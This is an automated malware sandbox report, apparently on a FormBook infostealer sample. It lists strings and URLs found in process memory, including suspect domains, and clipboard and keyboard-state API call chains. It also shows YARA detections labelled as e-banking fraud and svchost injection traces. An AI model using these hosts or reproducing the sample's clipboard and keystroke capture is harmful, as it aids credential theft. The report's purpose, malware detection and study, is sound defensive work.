            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000009.00000003.1666924999.0000000007CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH
            Source: clip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUH
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E8425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_00E8425A
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E84458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00E84458
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E8425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_00E8425A
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E70219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,4_2_00E70219
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E9CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_00E9CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: This is a third-party compiled AutoIt script.4_2_00E13B4C
            Source: TOgpmvvWoj.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: TOgpmvvWoj.exe, 00000004.00000000.1281210288.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cb18a89b-f
            Source: TOgpmvvWoj.exe, 00000004.00000000.1281210288.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_688f6a36-e
            Source: TOgpmvvWoj.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_190f7424-0
            Source: TOgpmvvWoj.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7701b5a4-d
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042AFF3 NtClose,6_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472B60 NtClose,LdrInitializeThunk,6_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034735C0 NtCreateMutant,LdrInitializeThunk,6_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03474340 NtSetContextThread,6_2_03474340
